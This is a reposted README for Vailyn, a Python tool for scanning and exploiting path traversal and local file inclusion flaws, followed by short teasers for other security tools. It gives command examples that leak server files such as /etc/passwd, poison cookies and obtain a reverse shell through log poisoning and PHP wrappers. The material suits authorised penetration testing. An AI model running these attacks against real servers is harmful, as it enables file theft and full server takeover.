Headline
Vailyn - A Phased, Evasive Path Traversal + LFI Scanning & Exploitation Tool In Python
<h1 align="center"><a href="http://4.bp.blogspot.com/-2rdx0vfyq9k/YTVN7X0T73I/AAAAAAAAuI4/Dl9NXtf72WkZGlSn7yTU6K97vHQSLTlcACK4BGAYYCw/s1600/Vailyn_1_logo-700923.png"><img alt="" border="0" height="400" id="BLOGGER_PHOTO_ID_7004590477845720946" src="http://4.bp.blogspot.com/-2rdx0vfyq9k/YTVN7X0T73I/AAAAAAAAuI4/Dl9NXtf72WkZGlSn7yTU6K97vHQSLTlcACK4BGAYYCw/w193-h400/Vailyn_1_logo-700923.png" width="193" /></a><br /> Vailyn <br /> </h1> <p align="center"><br /> Phased <a href="https://www.kitploit.com/search/label/Path%20Traversal" target="blank" title="Path Traversal">Path Traversal</a> & LFI Attacks </p> <blockquote> <p><strong>Vailyn 3.0</strong></p> <p>Since v3.0, Vailyn supports LFI PHP wrappers in Phase 1. Use <code>–lfi</code> to include them in the scan.</p> </blockquote> <br /><span style="font-size: x-large;"><b>About</b></span><br /> <p>Vailyn is a multi-phased <a href="https://www.kitploit.com/search/label/Vulnerability%20Analysis" target="blank" title="vulnerability analysis">vulnerability analysis</a> and exploitation tool for path traversal and file inclusion vulnerabilities. It is built to make it as performant as possible, and to offer a wide arsenal of filter evasion techniques.</p><span><a name=’more’></a></span><p><br /></p><span style="font-size: x-large;"><b>How does it work?</b></span><br /> <p>Vailyn operates in 2 phases. First, it checks if the vulnerability is present. It does so by trying to access /etc/passwd (or a user-specified file), with all of its evasive payloads. Analysing the response, payloads that worked are separated from the others.</p> <p>Now, the user can choose freely which payloads to use. Only these payloads will be used in the second phase.</p> <p>The second phase is the exploitation phase. Now, it tries to leak all possible files from the server using a file and a directory dictionary. The search depth and the directory permutation level can be adapted via arguments. Optionally, it can download found files, and save them in its loot folder. Alternatively, it will try to obtain a reverse shell on the system, letting the attacker gain full control over the server.</p> <p>Right now, it supports multiple attack vectors: injection via query, path, cookie and POST data.</p> <br /><span style="font-size: x-large;"><b>Why the phase separation?</b></span><br /> <p>The separation in several phases is done to hugely improve the performance of the tool. In previous versions, every file-directory combination was checked with every payload. This resulted in a huge overhead due to payloads being always used again, despite not working for the current page.</p> <br /><span style="font-size: x-large;"><b>Installation</b></span><br /> <p>Recommended & tested Python versions are 3.7+, but it should work fine with Python 3.5 & Python 3.6, too. To install Vailyn, download the archive from the release tab, or perform</p> <div class="snippet-clipboard-content position-relative" data-snippet-clipboard-copy-content="$ git clone https://github.com/VainlyStrain/Vailyn “><pre><code>$ git clone https://github.com/VainlyStrain/Vailyn<br /></code></pre></div> <p>Once on your system, you’ll need to install the Python dependencies.</p> <br /><span style="font-size: large;"><b>Unix Systems</b></span><br /> <p>On Unix systems, it is sufficient to run</p> <div class="snippet-clipboard-content position-relative” data-snippet-clipboard-copy-content="$ pip install -r requirements.txt # --user “><pre><code>$ pip install -r requirements.txt # --user<br /></code></pre></div> <br /><span style="font-size: large;"><b>Windows</b></span><br /> <p>Some libraries Vailyn uses do not work well with Windows, or will fail to install.</p> <p>If you use Windows, use <code>pip</code> to install the requirements listed in <code>Vailyn\·›\requirements-windows.txt</code>.</p> <p>If twisted fails to install, there is an unofficial version available <a href="https://www.lfd.uci.edu/~gohlke/pythonlibs/#twisted” rel="nofollow" target="blank" title="here">here</a>, which should build under Windows. Just bear in mind that this is a 3rd party download, and the integrity isn’t necessarily guaranteed. After this installed successfully, running pip again on <code>requirements-windows.txt</code> should work.</p> <br /><span style="font-size: large;"><b>Final Steps</b></span><br /> <p>If you want to fully use the reverse shell module, you’ll need to have <code>sshpass</code>, <code>ncat</code> and <code>konsole</code> installed. Package names vary by Linux distribution. On Windows, you’ll need to start the listener manually beforehand. If you don’t like <code>konsole</code>, you can specify a different terminal emulator in <code>core/config.py</code>.</p> <p>That’s it! Fire Vailyn up by moving to its installation directory and performing</p> <div class="snippet-clipboard-content position-relative" data-snippet-clipboard-copy-content="$ python Vailyn -h “><pre><code>$ python Vailyn -h<br /></code></pre></div> <br /><span style="font-size: x-large;"><b>Usage</b></span><br /> <p>Vailyn has 3 mandatory arguments: <code>-v VIC, -a INT and -p2 TP P1 P2</code>. However, depending on <code>-a</code>, more arguments may be required.</p> <div class="snippet-clipboard-content position-relative” data-snippet-clipboard-copy-content=" , \ / , ‘:. . /. ./ .:’ ':;. :\ .,:/ ‘’. /; …::’ ',’:.,..’’ ' ' :.__:''.:' ';.. ,;' * * '., .:'
v;. ;v’ o . ' ‘… :.’ ' . ' ':;, ' ' o ' . : * | Vailyn | [ VainlyStrain ] Vsynta Vailyn -v VIC -a INT -p2 TP P1 P2 [-p PAM] [-i F] [-Pi VIC2] [-c C] [-n] [-d I J K] [-s T] [-t] [-L] [-l] [-P] [-A] mandatory: -v VIC, --victim VIC Target to attack, part 1 [pre-payload] -a INT, --attack INT Attack type (int, 1-5, or A) A| Spider (all) 2| Path 5| POST Data, json P| Spider (partial) 3| Cookie 1| Query Parameter 4| POST Data, plain -p2 TP P1 P2, --phase2 TP P1 P2 Attack in Phase 2, and needed parameters ┌[ Values ]─────────────┬────────────────────┐ │ TP │ P1 │ P2 │ ├─────────┼─────────────┼────────────────────┤ │ leak │ File Dict │ Directory Dict │ │ inject │ IP Addr │ Listening Port │ │ implant │ Source File │ Server Destination │ └─────────┴─────────────┴────────────────────┘ additional: -p PAM, --param PAM query parameter or POST data for --attack 1, 4, 5 -i F, --check F File to check for in Phase 1 (df: etc/passwd) -Pi VIC2, --vic2 VIC2 Attack Target, part 2 [post-payload] -c C, --cookie C Cookie to append (in header format) -l, --loot Download found files into the loot folder -d I J K, --depths I J K depths (I: phase 1, J: phase 2, K: permutation level) -h, --help show this help menu and exit -s T, --timeout T Request Timeout; stable switch for Arjun -t, --tor Pipe attacks through the Tor anonymity network -L, --lfi Additionally use PHP wrappers to leak files -n, --nosploit skip Phase 2 (does not need -p2 TP P1 P2) -P, --precise Use exact depth in Phase 1 (not a range) -A, --app Start Vailyn’s Qt5 interface develop: --debug Display every path tried, even 404s. --version Print program version and exit. --notmain Avoid notify2 crash in subprocess call. Info: to leak files using absolute paths: -d 0 0 0 to get a shell using absolute paths: -d 0 X 0 "><pre><code> , \ / , <br /> ':. . /. ./ .:’<br /> ':;. :\ .,:/ '’. /; …::’<br /> ',’:.,._.’’ ' ' :.__:''.:'<br /> ';.. ,;' *<br /> * '., .:'<br />
v;. ;v’ o<br /> . ' ‘… :.’ ' .<br /> ' ':;, ' '<br /> o ' . : <br /> *<br /> | Vailyn |<br /> [ VainlyStrain ]<br /> <br />Vsynta Vailyn -v VIC -a INT -p2 TP P1 P2 <br /> [-p PAM] [-i F] [-Pi VIC2]<br /> [-c C] [-n] [-d I J K]<br /> [-s T] [-t] [-L]<br /> [-l] [-P] [-A] <br /><br />mandatory:<br /> -v VIC, --victim VIC Target to attack, part 1 [pre-payload]<br /> -a INT, --attack INT Attack type (int, 1-5, or A)< br/><br /> A| Spider (all) 2| Path 5| POST Data, json<br /> P| Spider (partial) 3| Cookie<br /> 1| Query Parameter 4| POST Data, plain<br /><br /> -p2 TP P1 P2, --phase2 TP P1 P2<br /> Attack in Phase 2, and needed parameters<br /><br />┌[ Values ]─────────────┬────────────────────┐<br />│ TP │ P1 │ P2 │<br />├─────────┼─────────────┼────────────────────┤<br />│ leak │ File Dict │ Directory Dict │<br />│ inject │ IP Addr │ Listening Port │<br />│ implant │ Source File │ Server Destination │<br />└─────────┴─────────────┴────────────────────┘<br /><br />additional:<br /> -p PAM, --param PAM query parameter or POST data for --attack 1, 4, 5<br /> -i F, --check F File to check for in Phase 1 (df: etc/passwd)<br /> -Pi VIC2, --vic2 VIC2 Attack Target, part 2 [post-payload]<br /> -c C, --cookie C Cookie to append (in header format)<br /> -l, --loot Download found files into the loot folder<br /> -d I J K, --depths I J K<br /> depths (I: phase 1, J: phase 2, K: permutation level )<br /> -h, --help show this help menu and exit<br /> -s T, --timeout T Request Timeout; stable switch for Arjun<br /> -t, --tor Pipe attacks through the Tor anonymity network<br /> -L, --lfi Additionally use PHP wrappers to leak files<br /> -n, --nosploit skip Phase 2 (does not need -p2 TP P1 P2)<br /> -P, --precise Use exact depth in Phase 1 (not a range)<br /> -A, --app Start Vailyn’s Qt5 interface<br /><br />develop:<br /> --debug Display every path tried, even 404s.<br /> --version Print program version and exit.<br /> --notmain Avoid notify2 crash in subprocess call.<br /><br />Info:<br /> to leak files using absolute paths: -d 0 0 0<br /> to get a shell using absolute paths: -d 0 X 0<br /></code></pre></div> <p>Vailyn currently supports 5 attack vectors, and provides a crawler to automate all of them. The attack performed is identified by the <code>-a INT</code> argument.</p> <div class="snippet-clipboard-content position-relative" data-snippet-clipboard-copy-content="INT attack ---- ------- 1 query-based attack (https://site.com?file=…/…/…/) 2 path-based attack (https://site.com/…/…/…/) 3 cookie-based attack (will grab the cookies for you) 4 plain post data (ELEM1=VAL1&ELEM2=…/…/…/) 5 json post data ({"file": “…/…/…/"}) A spider fetch + analyze all URLs from site using all vectors P partial spider fetch + analyze all URLs from site using only selected vectors “><pre><code>INT attack<br />---- -------<br />1 query-based attack (https://site.com?file=…/…/…/)<br />2 path-based attack (https://site.com/…/…/…/)<br />3 cookie-based attack (will grab the cookies for you)<br />4 plain post data (ELEM1=VAL1&ELEM2=…/…/…/)<br />5 json post data ({"file": “…/…/…/"})<br />A spider fetch + analyze all URLs from site using all vectors<br />P partial spider fetch + analyze all URLs from site using only selected vectors<br /></code></pre></div> <p>You also must specify a target to attack. This is done via <code>-v VIC</code> and <code>-Pi VIC2</code>, where -v is the part before the injection point, and -Pi the rest.</p> <p>Example: if the final URL should look like: <code>https://site.com/download.php?file=<ATTACK>¶m2=necessaryvalue</code>, you can specify <code>-v https://site.com/download.php</code> and <code>-Pi ¶m2=necessaryvalue</code> (and <code>-p file</code>, since this is a query attack).</p> <p>If you want to include PHP wrappers in the scan (like php://filter), use the <code>–lfi</code> argument. At the end of Phase 1, you’ll be presented with an additional selection menu containing the wrappers that worked. (if any)</p> <p>If the attacked site is behind a login page, you can supply an <a href="https://www.kitploit.com/search/label/Authentication” target="_blank” title="authentication">authentication</a> cookie via <code>-c COOKIE</code>. If you want to attack over Tor, use <code>–tor</code>.</p> <br /><span style="font-size: large;"><b>Phase 1</b></span><br /> <p>This is the analysis phase, where working payloads are separated from the others.</p> <p>By default, <code>/etc/passwd</code> is looked up. If the server is not running Linux, you can specify a custom file by <code>-i FILENAME</code>. Note that you must <strong>include subdirectories in FILENAME</strong>. You can modify the lookup depth with the first value of <code>-d</code> (default=8). If you want to use absolute paths, set the first depth to 0.</p> <br /><span style="font-size: large;"><b>Phase 2</b></span><br /> <p>This is the exploitation phase, where Vailyn will try to leak as much files as possible, or gain a reverse shell using various techniques.</p> <p>The depth of lookup in phase 2 (the maximal number of layers traversed back) is specified by the second value of the <code>-d</code> argument. The level of subdirectory permutation is set by the third value of <code>-d</code>.</p> <p>If you attack with absolute paths and perform the leak attack, set all depths to 0. If you want to gain a reverse shell, make sure that the second depth is greater than 0.</p> <p>By specifying <code>-l</code>, Vailyn will not only display files on the terminal, but also download and save the files into the loot folder.</p> <p>If you want a verbose output (display every output, not only found files), you can use <code>–debug</code>. Note that output gets really messy, this is basically just a debug help.</p> <p>To perform the bruteforce attack, you need to specify <code>-p2 leak FIL PATH</code>, where</p> <ul> <li>FIL is a dictionary file containing <strong>filenames only</strong> (e.g. index.php)</li> <li>PATH, is a dictionary file containing <strong>directory names only</strong>. Vailyn will handle directory permutation for you, so you’ll need only one directory per line.</li> </ul> <p>To gain a reverse shell by code injection, you can use <code>-p2 inject IP PORT</code>, where</p> <ul> <li>IP is your listening IP</li> <li>PORT is the port you want to listen on.</li> </ul> <blockquote> <p><strong>WARNING</strong></p> <p>Vailyn employs Log Poisoning techniques. Therefore, YOUR SPECIFIED IP WILL BE VISIBLE IN THE SERVER LOGS.</p> </blockquote> <p>The techniques (only work for LFI inclusions):</p> <ul> <li><code>/proc/self/environ inclusion</code> only works on outdated servers</li> <li><code>Apache + Nginx Log Poisoning & inclusion</code></li> <li><code>SSH Log Poisoning</code></li> <li><code>poisoned mail inclusion</code></li> <li>wrappers <ul> <li><code>expect://</code></li> <li><code>data:// (plain & b64)</code></li> <li><code>php://input</code></li> </ul> </li> </ul> <br /><span style="font-size: x-large;"><b>False Positive prevention</b></span><br /> <p>To distinguish real results from false positives, Vailyn does the following checks:</p> <ul> <li>check the status code of the response</li> <li>check if the response is identical to one taken before attack start: this is useful e.g, when the server returns 200, but ignores the payload input or returns a default page if the file is not found.</li> <li>similar to #2, perform an additional check for query GET parameter handling (useful when server returns error that a needed parameter is missing)</li> <li>check for empty responses</li> <li>check if common error signatures are in the response content</li> <li>check if the payload is contained in the response: this is an additional check for the case the server responds 200 for non-existing files, and reflects the payload in a message (like …/…/secret not found)</li> <li>check if the entire response is contained in the init check response: useful when the server has a default include which disappears in case of 404</li> <li>for <code>-a 2</code>, perform an additional check if the response content matches the content from the server root URL</li> <li>REGEX check for <code>/etc/passwd</code> if using that as lookup file</li> </ul> <br /><span style="font-size: x-large;"><b>Examples</b></span><br /> <ul> <li> <p>Simple Query attack, leaking files in Phase 2: <code>$ Vailyn -v “http://site.com/download.php” -a 1 -p2 leak dicts/files dicts/dirs -p file</code> --> <code>http://site.com/download.php?file=…/INJECT</code></p> </li> <li> <p>Query attack, but I know a file <code>file.php</code> exists on exactly 2 levels above the inclusion point: <code>$ Vailyn -v “http://site.com/download.php” -a 1 -p2 leak dicts/files dicts/dirs -p file -i file.php -d 2 X X -P</code> This will shorten the duration of Phase 1 very much, since its a targeted attack.</p> </li> <li> <p>Simple Path attack: <code>$ Vailyn -v “http://site.com/” -a 2 -p2 leak dicts/files dicts/dirs</code> --> <code>http://site.com/…/INJECT</code></p> </li> <li> <p>Path attack, but I need query parameters and tag: <code>$ Vailyn -v “http://site.com/” -a 2 -p2 leak dicts/files dicts/dirs -Pi “?token=X#title"</code> --> <code>http://site.com/…/INJECT?token=X#title</code></p> </li> <li> <p>Simple Cookie attack: <code>$ Vailyn -v “http://site.com/cookiemonster.php” -a 3 -p2 leak dicts/files dicts/dirs</code> Will fetch cookies and you can select cookie you want to poison</p> </li> <li> <p>POST Plain Attack: <code>$ Vailyn -v “http://site.com/download.php” -a 4 -p2 leak dicts/files dicts/dirs -p “DATA1=xx&DATA2=INJECT"</code> will infect DATA2 with the payload</p> </li> <li> <p>POST JSON Attack: <code>$ Vailyn -v “http://site.com/download.php” -a 5 -p2 leak dicts/files dicts/dirs -p '{"file": “INJECT"}’</code></p> </li> <li> <p>Attack, but target is behind login screen: <code>$ Vailyn -v “http://site.com/” -a 1 -p2 leak dicts/files dicts/dirs -c “sessionid=foobar"</code></p> </li> <li> <p>Attack, but I want a reverse shell on port 1337: <code>$ Vailyn -v “http://site.com/download.php” -a 1 -p2 inject MY.IP.IS.XX 1337 # a high Phase 2 Depth is needed for log injection</code> (will start a ncat listener for you if on Unix)</p> </li> <li> <p>Full automation in crawler mode: <code>$ Vailyn -v “http://root-url.site” -a A</code> <em>you can also specify other args, like cookie, depths, lfi & lookup file here</em></p> </li> <li> <p>Full automation, but Arjun needs <code>–stable</code>: <code>$ Vailyn -v “http://root-url.site” -a A -s ANY</code></p> </li> </ul> <br /><span style="font-size: x-large;"><b>Demo</b></span><br /> <p><a href="https://asciinema.org/a/384813” rel="nofollow” target="_blank” title="A phased, evasive Path Traversal + LFI scanning & exploitation tool in Python (8)“><img alt="A phased, evasive Path Traversal + LFI scanning & exploitation tool in Python (4)" data-canonical-src="https://asciinema.org/a/384813.svg” src="https://camo.githubusercontent.com/3ab9f2b423f112ec1587e89d76c1dd2fa6cfa02f742842a235605f06682b6048/68747470733a2f2f61736369696e656d612e6f72672f612f3338343831332e737667” style="max-width: 100%;” /></a> Vailyn’s Crawler analyzing a <a href="https://www.kitploit.com/search/label/Damn%20Vulnerable" target="_blank" title="damn vulnerable">damn vulnerable</a> web application. LFI Wrappers are not enabled.</p> <p><a href="https://www.youtube.com/watch?v=rFlR_SHk9fc" rel="nofollow" target="_blank" title="GUI Demonstration (v2.2.1-5)“>GUI Demonstration (v2.2.1-5)</a></p> <br /><span style="font-size: x-large;"><b>Possible Issues</b></span><br /> <p>Found some false positives/negatives (or want to point out other bugs/improvements): please leave an issue!</p> <br /><span style="font-size: x-large;"><b>Code of Conduct</b></span><br /> <blockquote> <p>Vailyn is provided as an offensive web application audit tool. It has built-in functionalities which can reveal potential <a href="https://www.kitploit.com/search/label/vulnerabilities” target="_blank" title="vulnerabilities">vulnerabilities</a> in web applications, which could be exploited maliciously.</p> <p><strong>THEREFORE, NEITHER THE AUTHOR NOR THE CONTRIBUTORS ARE RESPONSIBLE FOR ANY MISUSE OR DAMAGE DUE TO THIS TOOLKIT.</strong></p> <p>By using this software, the user obliges to follow their local laws, to not attack someone else’s system without explicit permission from the owner, or with malicious intent.</p> <p>In case of an infringement, only the end user who committed it is accountable for their actions.</p> </blockquote> <br /><span style="font-size: x-large;"><b>Credits & Copyright</b></span><br /> <blockquote> <p>Vailyn: Copyright © <a href="https://github.com/VainlyStrain" rel="nofollow" target="_blank" title="VainlyStrain">VainlyStrain</a></p> <p>Arjun: Copyright © <a href="https://github.com/s0md3v" rel="nofollow" target="_blank" title="s0md3v">s0md3v</a></p> </blockquote> <p>Arjun is no longer distributed with Vailyn. Install its latest version via pip.</p> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/VainlyStrain/Vailyn" rel="nofollow" target="_blank" title="Download Vailyn">Download Vailyn</a></span></b></div>
Related news
<p><a href="http://2.bp.blogspot.com/-RfSp1Prm8Ns/YUOxaTgLFfI/AAAAAAAAvAE/SN4RCzdEi0Y5JMgSOfk7QtJ4oTb9HJ_hACK4BGAYYCw/s1600/PoW-Shield_7_screenshot-773941.jpeg" style="text-align: center;"><img alt="" border="0" height="290" id="BLOGGER_PHOTO_ID_7008640510588556786" src="http://2.bp.blogspot.com/-RfSp1Prm8Ns/YUOxaTgLFfI/AAAAAAAAvAE/SN4RCzdEi0Y5JMgSOfk7QtJ4oTb9HJ_hACK4BGAYYCw/w640-h290/PoW-Shield_7_screenshot-773941.jpeg" width="640" /></a></p><p><br /></p> <p>Project dedicated to provide DDoS <a href="https://www.kitploit.com/search/label/Protection" target="_blank" title="protection">protection</a> with proof-of-work</p><span><a name='more'></a></span><p style="text-align: center;"><br /></p><span style="font-size: large;"><b>Description</b></span><br /> <p>PoW Shield provides DDoS protection on OSI application layer by acting as a proxy that utilizes proof of work between the backend service and the end user. This project aims to provide an alternative to general captcha methods su...
<p style="text-align: center;"><a href="https://1.bp.blogspot.com/-uBauZSD-Bhk/YUseN81_vXI/AAAAAAAAvSM/EC84hZKBoEwOsqwKqEIWBK4gLBDaa3zKgCNcBGAsYHQ/s1099/jspanda_3_pollute.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="844" data-original-width="1099" height="492" src="https://1.bp.blogspot.com/-uBauZSD-Bhk/YUseN81_vXI/AAAAAAAAvSM/EC84hZKBoEwOsqwKqEIWBK4gLBDaa3zKgCNcBGAsYHQ/w640-h492/jspanda_3_pollute.png" width="640" /></a></p><p style="text-align: center;"><br /></p> <p>JSpanda is client-side prototype pollution <a href="https://www.kitploit.com/search/label/Vulnerability" target="_blank" title="vulnerability">vulnerability</a> scanner. It has two key features, scanning vulnerability the supplied URLs and analyzing the JavaScript libraries' source code.</p> <p>However, JSpanda cannot detect advanced prototype pollution vulnerabilities.</p><span><a name='more'></a></span><div><br /></div><span style="font-size: large;"><b><stron...
<p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-tGjIlM9LBZc/YUqO4Rh9sPI/AAAAAAAAvRs/bm1bfExG9XAPtJE5eSPbA7TGazin3GVsACNcBGAsYHQ/s741/secure_password.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="357" data-original-width="741" height="308" src="https://1.bp.blogspot.com/-tGjIlM9LBZc/YUqO4Rh9sPI/AAAAAAAAvRs/bm1bfExG9XAPtJE5eSPbA7TGazin3GVsACNcBGAsYHQ/w640-h308/secure_password.png" width="640" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div><p></p> <p>This script securely encrypts or decrypts <a href="https://www.kitploit.com/search/label/Passwords" target="_blank" title="passwords">passwords</a> on disk within a custom database file. It also features functionality to retrieve passwords from a previously generated database file. This script takes a master password from stdin/from memory, then <a href="https://www.kitploit.com/search/...
<p style="text-align: center;"><a href="http://1.bp.blogspot.com/-Eb1ngQXSYFs/YUOxfKGrtdI/AAAAAAAAvAM/kvv1AGXrZ64I7ehBqzTL1k0IlVJF16HWQCK4BGAYYCw/s1600/dirsearch_1_babygopher-badge-790842.png"><img alt="" border="0" id="BLOGGER_PHOTO_ID_7008640593965069778" src="http://1.bp.blogspot.com/-Eb1ngQXSYFs/YUOxfKGrtdI/AAAAAAAAvAM/kvv1AGXrZ64I7ehBqzTL1k0IlVJF16HWQCK4BGAYYCw/s320/dirsearch_1_babygopher-badge-790842.png" /></a></p><br /> <p>This software is a Go implementation of the original <a href="https://github.com/maurosoria/dirsearch" rel="nofollow" target="_blank" title="dirsearch tool">dirsearch tool</a> written by <code>Mauro Soria</code>. DirSearch is the very first tool I write in Go, mostly to play and experiment with Go's concurrency model, channels, and so forth :)</p><p><span></span></p><a name='more'></a> <p></p><span style="font-size: large;"><b>Purpose</b></span><br /> <p>DirSearch takes an input URL ( <code>-url</code> parameter ) and a wordlist ( <code>-wordlist</cod...
<p><a href="http://3.bp.blogspot.com/-w1TWIH0VmMU/YTVKoFtzVYI/AAAAAAAAt1U/Rc1XoXgIzw0KwG4SRi4foI0Aq9_Lm0x_wCK4BGAYYCw/s1600/PyHook_1_Demo-754513.gif" style="text-align: center;"><img alt="" border="0" height="328" id="BLOGGER_PHOTO_ID_7004586848034182530" src="http://3.bp.blogspot.com/-w1TWIH0VmMU/YTVKoFtzVYI/AAAAAAAAt1U/Rc1XoXgIzw0KwG4SRi4foI0Aq9_Lm0x_wCK4BGAYYCw/w640-h328/PyHook_1_Demo-754513.gif" width="640" /></a></p><br /> <p>PyHook is the python implementation of my <a href="https://github.com/IlanKalendarov/SharpHook" rel="nofollow" target="_blank" title="SharpHook">SharpHook</a> project, It uses various API hooks in order to give us the desired credentials.</p> <p>PyHook Uses <a href="https://www.kitploit.com/search/label/Frida" target="_blank" title="frida">frida</a> to inject it's dependencies into the target process</p><span><a name='more'></a></span><p><br /></p><span style="font-size: large;"><b>Supported Processes</b></span><br /> <table> <tr> <th>Process</th> <th>A...
<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-TlTrewoCKCE/YUOfTfW4GvI/AAAAAAAAuwI/7AugxQAOxzIaT7YBQ-1D-MXde7jBohv4QCNcBGAsYHQ/s663/Mail.Rip.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="575" data-original-width="663" height="556" src="https://1.bp.blogspot.com/-TlTrewoCKCE/YUOfTfW4GvI/AAAAAAAAuwI/7AugxQAOxzIaT7YBQ-1D-MXde7jBohv4QCNcBGAsYHQ/w640-h556/Mail.Rip.png" width="640" /></a></div><p><br /></p> <p> Your SMTP checker / SMTP cracker for mailpass combolists including features like: proxy-support (SOCKS4 / SOCKS5) with automatic proxy-scraper and checker, e-mail delivery / inbox check and DNS lookup for unknown SMTP-hosts. Made for easy usage and always working!</p><span><a name='more'></a></span><div><br /></div><span style="font-size: large;"><b>Overview</b></span><br /> <br /><b>Legal Notices</b><br /> <p> <b>You are ONLY allowed to use the following ...
<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-h0VI37sR9_k/YUqNP3yhHHI/AAAAAAAAvRY/YEfOeO7sMlEHVNzTe5DeRVQ8dm0DnEf6ACNcBGAsYHQ/s1851/weakpass_1_sample.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="939" data-original-width="1851" height="324" src="https://1.bp.blogspot.com/-h0VI37sR9_k/YUqNP3yhHHI/AAAAAAAAvRY/YEfOeO7sMlEHVNzTe5DeRVQ8dm0DnEf6ACNcBGAsYHQ/w640-h324/weakpass_1_sample.png" width="640" /></a></div><p><br /></p><p>The tool generates a <a href="https://www.kitploit.com/search/label/Wordlist" target="_blank" title="wordlist">wordlist</a> based on a set of words entered by the user.</p><span><a name='more'></a></span><p><br /></p><p>For example, during penetration testing, you need to gain access to some service, device, account, or Wi-Fi network that is password protected. For example, let it be the <em>Wi-Fi</em> network of <strong>EvilCorp</strong>. Sometimes, a passw...
<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-M_M-0bf6M28/YUOdpCkjs4I/AAAAAAAAuwA/voMYX-s0vSkdD7d3_EoPvBC-EF93luWFQCNcBGAsYHQ/s2048/crowdsec_logo.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1383" data-original-width="2048" height="432" src="https://1.bp.blogspot.com/-M_M-0bf6M28/YUOdpCkjs4I/AAAAAAAAuwA/voMYX-s0vSkdD7d3_EoPvBC-EF93luWFQCNcBGAsYHQ/w640-h432/crowdsec_logo.png" width="640" /></a></div><p><br /></p> <p>CrowdSec is a free, modern & collaborative behavior detection engine, coupled with a global IP reputation network. It stacks on fail2ban's philosophy but is IPV6 compatible and 60x faster (Go vs Python), uses Grok patterns to parse logs and YAML scenario to identify behaviors. CrowdSec is engineered for modern Cloud / <a href="https://www.kitploit.com/search/label/Containers" target="_blank" title="Containers">Containers</a> / VM based infrastructures (by dec...
<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-_KxV4jubhaU/YUOcgzhpbJI/AAAAAAAAuvw/Sc0xmixjtXoKF7G1bAmJ0ibxfmIDEAIxwCNcBGAsYHQ/s873/PS2EXE.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="381" data-original-width="873" height="280" src="https://1.bp.blogspot.com/-_KxV4jubhaU/YUOcgzhpbJI/AAAAAAAAuvw/Sc0xmixjtXoKF7G1bAmJ0ibxfmIDEAIxwCNcBGAsYHQ/w640-h280/PS2EXE.JPG" width="640" /></a></div><p><br /></p> <p>Overworking of the great script of Ingo Karstein with GUI support. The GUI output and input is activated with one switch, real windows executables are generated. With Powershell 5.x support and graphical front end.</p> <p>Module version.</p><span><a name='more'></a></span><p><br /></p> <p>You find the script based version here (<a href="https://github.com/MScholtes/TechNet-Gallery" rel="nofollow" target="_blank" title="https://github.com/MScholtes/TechNet-Gallery">https://githu...
<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-CwR1NpKuyd4/YUObnj1bvzI/AAAAAAAAuvo/jTm7kjPutFA9rMwYWJtmittz4F4lid6LgCNcBGAsYHQ/s930/InlineExecute.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="606" data-original-width="930" height="418" src="https://1.bp.blogspot.com/-CwR1NpKuyd4/YUObnj1bvzI/AAAAAAAAuvo/jTm7kjPutFA9rMwYWJtmittz4F4lid6LgCNcBGAsYHQ/w640-h418/InlineExecute.png" width="640" /></a></div><p><br /></p> <p>InlineExecute-Assembly is a <a href="https://www.kitploit.com/search/label/Proof%20Of%20Concept" target="_blank" title="proof of concept">proof of concept</a> Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module. InlineExecute-Assembly will execute any assembly with the entry point of <code>Main(string[] args)</code> or <code>Mai...
<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-4w-yAJHKJ4Q/YUOMKJAmDwI/AAAAAAAAuuY/2Tqomqypu58DXaQApHuQiwhXEcC7q17ZgCNcBGAsYHQ/s800/graphql.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="280" data-original-width="800" height="224" src="https://1.bp.blogspot.com/-4w-yAJHKJ4Q/YUOMKJAmDwI/AAAAAAAAuuY/2Tqomqypu58DXaQApHuQiwhXEcC7q17ZgCNcBGAsYHQ/w640-h224/graphql.png" width="640" /></a></div><p><br /></p> <p>BatchQL is a GraphQL security <a href="https://www.kitploit.com/search/label/Auditing" target="_blank" title="auditing">auditing</a> script with a focus on performing batch GraphQL queries and mutations. This script is not complex, and we welcome improvements.</p> <p>When exploring the problem space of GraphQL batching attacks, we found that there were a few blog posts on the internet, however no tool to perform GraphQL batching attacks.</p> <p>GraphQL batching attacks can be...
<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-JMl-654CheQ/YUOLZnQfumI/AAAAAAAAuuQ/JGDFkb4V1iQ5GvRUodx6ZDEecD6q2iZ1gCNcBGAsYHQ/s300/printer_hack.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="168" data-original-width="300" height="358" src="https://1.bp.blogspot.com/-JMl-654CheQ/YUOLZnQfumI/AAAAAAAAuuQ/JGDFkb4V1iQ5GvRUodx6ZDEecD6q2iZ1gCNcBGAsYHQ/w640-h358/printer_hack.jpeg" width="640" /></a></div><p><br /></p> <p>Concealed Position is a local <a href="https://www.kitploit.com/search/label/Privilege%20Escalation" target="_blank" title="privilege escalation">privilege escalation</a> attack against Windows using the concept of "Bring Your Own Vulnerability". Specifically, Concealed Position (CP) uses the <em>as designed</em> package point and print logic in Windows that allows a low privilege user to stage and install printer drivers. CP specifically installs drivers with <a hr...
